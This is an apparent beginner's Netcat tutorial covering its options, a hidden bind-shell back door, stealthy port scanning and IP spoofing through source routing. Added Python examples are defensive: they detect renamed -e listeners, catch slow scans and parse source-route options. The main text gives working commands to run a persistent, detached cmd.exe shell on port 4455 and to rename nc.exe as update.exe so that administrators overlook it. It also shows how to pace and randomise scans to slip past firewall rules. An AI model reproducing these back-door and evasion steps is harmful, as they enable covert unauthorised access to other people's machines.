TUTORIAL NETCAT FOR NEWBIES

In summary, Netcat makes and accepts TCP and UDP connections. That is all! Netcat reads and writes data over those connections until they are closed. It provides a basic TCP/UDP network subsystem that lets users interact, either interactively or from a script, with network applications and services at the application layer. It lets us see raw TCP and UDP data before it is wrapped by the next higher layer, such as FTP, SMTP, or HTTP. Before you continue, I should tell you that you will need to have Netcat in C:\WINDOWS\System32, for reasons that are not central to this manual.

COMMAND LINE

The basic Netcat command line is nc [options] host ports, where host is the IP address you want to scan and ports is a single port, a range of ports, or several ports or ranges separated by spaces. Let's take a look at each of the options.

-d Lets nc run detached from the MS-DOS command prompt window (in the background).
-e <command> When nc is listening, runs <command> the moment someone connects to the port it is listening on.
-i <seconds> Delay interval: the amount of time nc waits between two successive sends of data.
-g <gateway-list> You can give up to 8 -g options on the command line to force nc's traffic through certain IP addresses (source routing).
-G <hop-pointer> Defines which of the -g addresses is the next hop on the source route (the hop pointer).
-l Puts nc in listen mode.
-L Puts nc in listen mode, but "listens harder": it keeps listening after a connection closes.
-n Tells nc not to do any host-name lookups.
-o <hexfile> Performs a hex dump of the data and stores it in hexfile.
-p <port> Lets you specify the local port nc will use.
-r nc chooses local and remote ports randomly.
-s Specifies the source IP address nc should use when it makes its connections.
-t Handles Telnet option negotiation.
-u Tells nc to use UDP instead of TCP.
-v Reports nc's status; add a second -v to get more information.
-w <seconds> Controls how long nc waits before terminating a connection.
-z Tells nc to send only the minimum data needed to find out which ports have something listening.

GET REMOTE ACCESS TO A SHELL

If you run nc.exe -l -p 4455 -e cmd.exe from a command prompt window on a Windows NT or Windows 2000 platform, anyone who telnets to port 4455 on that machine will get a DOS shell without having to log in.

Quite elegant, but also a little scary. Almost without effort we have just obtained a command prompt on the attacked system. Naturally, on Windows NT and Windows 2000 systems you will have the same privileges and services as the user running Netcat. If we create a back door this way on Windows 95 or Windows 98, we obtain complete control.
Let's look deeper into this command. Remember that by default Netcat runs in the DOS window from which it was launched, which means that command window must stay open while Netcat is running. To avoid this we use the -d option from the command prompt.

Code:
C:\>nc.exe -l -p 4455 -d -e cmd.exe

In this way we can hide a Netcat-based back door.

However, if someone telnets to port 4455 and connects, as soon as that connection ends Netcat thinks its work is done and stops listening. To avoid this we use the -L option, which tells Netcat to keep listening ("listen harder") even after a connection has completed.

Code:
C:\>nc.exe -p 4455 -d -L -e cmd.exe

This lets us keep returning to the system until its administrator discovers the back door. And to avoid being discovered we can rename nc.exe to anything else. Note: in this example I have moved nc.exe to C:\ rather than C:\Windows\System32.

Anyone could overlook something as seemingly harmless as update.exe. Another Netcat feature: if we run it without any options on the command line, it prompts us to enter the command line on the first line of standard input.
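As an added example (not part of the original tutorial), here is a Python check an administrator could run over `netstat -ano` and `wmic process get ProcessId,CommandLine /format:csv` output to find the kind of listener described above: a process that hands every incoming connection to a program with -e, whatever the binary has been renamed to. Both output samples are constructed, not real captures.

```python
import re
# Constructed sample shaped like `netstat -ano` output (not a real capture).
NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:4455           0.0.0.0:0              LISTENING       3120
  TCP    192.168.1.20:49710     192.168.1.1:443        ESTABLISHED     2044
"""
# Constructed sample shaped like `wmic process get ProcessId,CommandLine /format:csv`
# (columns Node,CommandLine,ProcessId); the back door has been renamed to update.exe.
PROCS = """\
Node,CommandLine,ProcessId
HOST1,C:\\Windows\\system32\\svchost.exe -k RPCSS,912
HOST1,C:\\update.exe -p 4455 -d -L -e cmd.exe,3120
HOST1,"C:\\Program Files\\Browser\\browser.exe" --type=renderer,2044
"""
# -e <program>: the listener runs a program for every connection (cmd.exe in the tutorial).
EXEC_FLAG = re.compile(r"(?:^|\s)-e\s+\S")
PERSIST_FLAGS = re.compile(r"(?:^|\s)-[Ld](?=\s|$)")  # -L listen harder / -d detach: persistence

def listening_ports(netstat_text):
    """Map each PID to the local TCP ports it has in LISTENING state."""
    ports = {}
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            ports.setdefault(int(fields[4]), []).append(int(fields[1].rsplit(":", 1)[1]))
    return ports

def command_lines(wmic_csv):
    """Map each PID to its command line; split on first and last comma so quoted paths survive."""
    cmds = {}
    for line in wmic_csv.splitlines()[1:]:
        if line.strip():
            _node, rest = line.split(",", 1)
            cmd, pid = rest.rsplit(",", 1)
            cmds[int(pid)] = cmd
    return cmds

def find_nc_backdoors(netstat_text, wmic_csv):
    """Return (pid, port, cmdline, persistent) for each listener whose command line uses -e.
    The binary name is deliberately ignored: the tutorial renames nc.exe to update.exe."""
    cmds = command_lines(wmic_csv)
    hits = []
    for pid, ports in listening_ports(netstat_text).items():
        cmd = cmds.get(pid, "")
        if EXEC_FLAG.search(cmd):
            persistent = bool(PERSIST_FLAGS.search(cmd))
            hits.extend((pid, port, cmd, persistent) for port in ports)
    return hits
```

Matching on the -e flag rather than on the file name is the point: the listener on 4455 is reported even though nothing on the box is called nc.exe.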



SILENT PORT SCANNING

Since Netcat can talk to a range of ports, a very obvious use is as a port scanner. The -z option is the answer. This option tells Netcat to send a given amount of data to each port, but only enough to learn whether the port is open or not. We also use the -v or -vv option, because without at least one -v we will not see the scan results. Here I am scanning ports 139 to 145 on 127.0.0.1. The result I got is that only 139, 141 and 142 are open.

But this is not the most correct way to do it, so to speak, because some firewall applications will block a given IP address if they receive too many connections from it in a very short period of time. To keep that from happening, Netcat lets you scan more discreetly, so discreetly that it does not look like a port scan: use the -i option to set a delay interval between probes and the -r option to probe the ports in random order. The same procedure can be used for UDP ports just by adding -u to the command line.
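An added example (not from the original tutorial) of why the -i/-r trick defeats the firewall rule described above and what catches it anyway: the burst rule counts connections per source in a short window, while a distinct-destination-port count over a longer window is indifferent to delay and ordering. The log lines are constructed; the format "<time> <source> -> <port>" is an assumption, not any real firewall's.

```python
from collections import defaultdict, deque
from datetime import datetime
# Constructed firewall connection log (not a real capture): "<time> <source ip> -> <dest port>".
# 10.0.0.7 is a normal client; 10.0.0.5 scans 139-143 at once; 10.0.0.9 scans with -r -i 10.
LOG = """\
2015-03-01T10:00:00 10.0.0.7 -> 443
2015-03-01T10:00:30 10.0.0.7 -> 443
2015-03-01T10:01:00 10.0.0.7 -> 443
2015-03-01T10:00:05 10.0.0.5 -> 139
2015-03-01T10:00:05 10.0.0.5 -> 140
2015-03-01T10:00:05 10.0.0.5 -> 141
2015-03-01T10:00:05 10.0.0.5 -> 142
2015-03-01T10:00:05 10.0.0.5 -> 143
2015-03-01T10:00:00 10.0.0.9 -> 142
2015-03-01T10:00:11 10.0.0.9 -> 139
2015-03-01T10:00:22 10.0.0.9 -> 145
2015-03-01T10:00:34 10.0.0.9 -> 141
2015-03-01T10:00:45 10.0.0.9 -> 143
2015-03-01T10:00:57 10.0.0.9 -> 140
"""

def parse_log(text):
    """Return (timestamp, source, port) events sorted by time."""
    events = []
    for line in text.splitlines():
        when, src, _arrow, port = line.split()
        events.append((datetime.fromisoformat(when), src, int(port)))
    return sorted(events)

def sliding_rule(events, window_s, exceeds):
    """Per-source sliding window: flag a source once exceeds() is true for its recent (time, port) list."""
    flagged, recent = set(), defaultdict(deque)
    for when, src, port in events:
        window = recent[src]
        window.append((when, port))
        while (when - window[0][0]).total_seconds() > window_s:
            window.popleft()
        if exceeds(window):
            flagged.add(src)
    return flagged

def burst_rule(events, max_conns=4, window_s=2):
    """What the tutorial says firewalls do: too many connections from one source in a short period."""
    return sliding_rule(events, window_s, lambda w: len(w) > max_conns)

def distinct_port_rule(events, min_ports=5, window_s=120):
    """Distinct destination ports per source over a long window: -i and -r do not hide that."""
    return sliding_rule(events, window_s, lambda w: len({p for _, p in w}) >= min_ports)
```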

SPOOFING AN IP ADDRESS

Impersonating an IP address is simple. Firewalls that perform masquerading, or network address translation, impersonate IP addresses every day. These devices take a packet from an internal IP address, change the packet's source IP address to their own, send it out over the network, and undo the change when the reply comes back from the destination. That is why we say that modifying the source IP address of an IP packet is simple. What is difficult is receiving the data sent back to the spoofed IP address.

Netcat has the -s option, which lets us specify any source IP address we want. Anyone could start a port scan using -s to make you think you are being scanned by Microsoft or the FBI. The problem comes when we want the replies addressed to the spoofed IP forwarded to our real IP address. Suppose, for example, that the target host thinks it received a connection request from Microsoft: it will try to send an acknowledgement to that Microsoft IP. Naturally, that address will have no idea what the destination host is talking about and will send a reset. How can we get the information back to our real IP address without being discovered?

Short of attacking the destination machine, the only other viable option is source routing. Source routing lets a network application specify the path a packet should follow to reach its destination.

There are two types of source routing: strict and loose. Strict source routing means the packet must specify every hop on the route to the destination host. Some routers and other network devices still allow strict source routing, but very few allow loose source routing. Loose source routing tells the routers and network devices that they can do most of the routing to reach the destination host; this is what lets us make the packet pass back through our machine on its return. Using this method, source routing can let us spoof an IP address and still get the replies on the return trip. Most routers ignore source-routing options, but not all.

The -g option lets us specify up to 8 hops the packet must make before reaching its destination. For example, nc -g 10.10.4.5 -g 10.10.5.8 -g 10.10.7.4 -g 10.10.9.9 10.10.9.50 23 will contact the telnet port on 10.10.9.50, but if source-routing options are enabled on the routers in between, the traffic will be forced to follow the path through those 4 locations before reaching its destination. If you try nc -g 10.10.4.5 -g 10.10.5.8 -g 10.10.7.4 -g 10.10.9.9 -G 12 10.10.9.50 23, we are specifying a hop pointer with -G. The -G option sets the hop pointer to the nth byte (here the twelfth), and because IP addresses are 4 bytes long, the hop pointer will start at 10.10.7.4. So on its way to 10.10.9.50 the traffic only needs to traverse the last two machines (because, according to the hop pointer, we have already been through the first two). On the return trip, however, the packet does go through all 4 machines.
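To make the -G arithmetic concrete, here is an added Python example (not part of the original tutorial) that encodes a -g list and -G pointer as the RFC 791 loose-source-route IP option, decodes which hops are still to be visited, and shows the check a border device needs in order to find (and drop) source-routed packets. The IPv4 header it builds is constructed for illustration only.

```python
import struct
import ipaddress
LSRR, SSRR = 131, 137  # IP option types: Loose / Strict Source and Record Route (RFC 791)

def build_lsrr(gateways, pointer=4):
    """Encode the loose-source-route option that nc's -g/-G flags describe.
    gateways: the -g list (1 to 8 hops). pointer: the -G value, a 1-based byte offset into the
    option of the next hop to visit; 4 is the first address, 8 the second, and so on."""
    if not 1 <= len(gateways) <= 8:
        raise ValueError("nc accepts between 1 and 8 -g hops")
    if pointer < 4 or pointer % 4 or pointer > 4 + 4 * len(gateways):
        raise ValueError("pointer must be 4, 8, 12, ... within the address list")
    addrs = b"".join(ipaddress.IPv4Address(g).packed for g in gateways)
    return struct.pack("BBB", LSRR, 3 + len(addrs), pointer) + addrs

def parse_lsrr(option):
    """Decode an LSRR option into (full route, hops still to visit)."""
    kind, length, pointer = struct.unpack("BBB", option[:3])
    if kind != LSRR or length != len(option) or (length - 3) % 4:
        raise ValueError("not a well-formed LSRR option")
    route = [str(ipaddress.IPv4Address(option[i:i + 4])) for i in range(3, length, 4)]
    return route, route[(pointer - 4) // 4:]

def find_source_route(ip_header):
    """Walk the IPv4 options area and return the LSRR/SSRR option bytes, or None if there is none.
    A border device that wants to drop source-routed packets needs exactly this check."""
    ihl = (ip_header[0] & 0x0F) * 4
    i = 20
    while i < ihl:
        kind = ip_header[i]
        if kind == 0:          # End of Option List
            break
        if kind == 1:          # No Operation: single byte, no length field
            i += 1
            continue
        length = ip_header[i + 1]
        if kind in (LSRR, SSRR):
            return bytes(ip_header[i:i + length])
        i += length
    return None

def ipv4_header_with_option(option):
    """Constructed 20-byte IPv4 header plus an options area padded to a 4-byte boundary."""
    padding = b"\x00" * (-len(option) % 4)
    ihl = (20 + len(option) + len(padding)) // 4
    return bytes([0x40 | ihl]) + bytes(19) + option + padding
```

With the tutorial's four hops and -G 12, parse_lsrr reports the remaining route as 10.10.7.4 and 10.10.9.9, matching the text: pointer 4 is the first address, 8 the second, 12 the third.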
All Rights Reserved by TOS © 2014 - 2015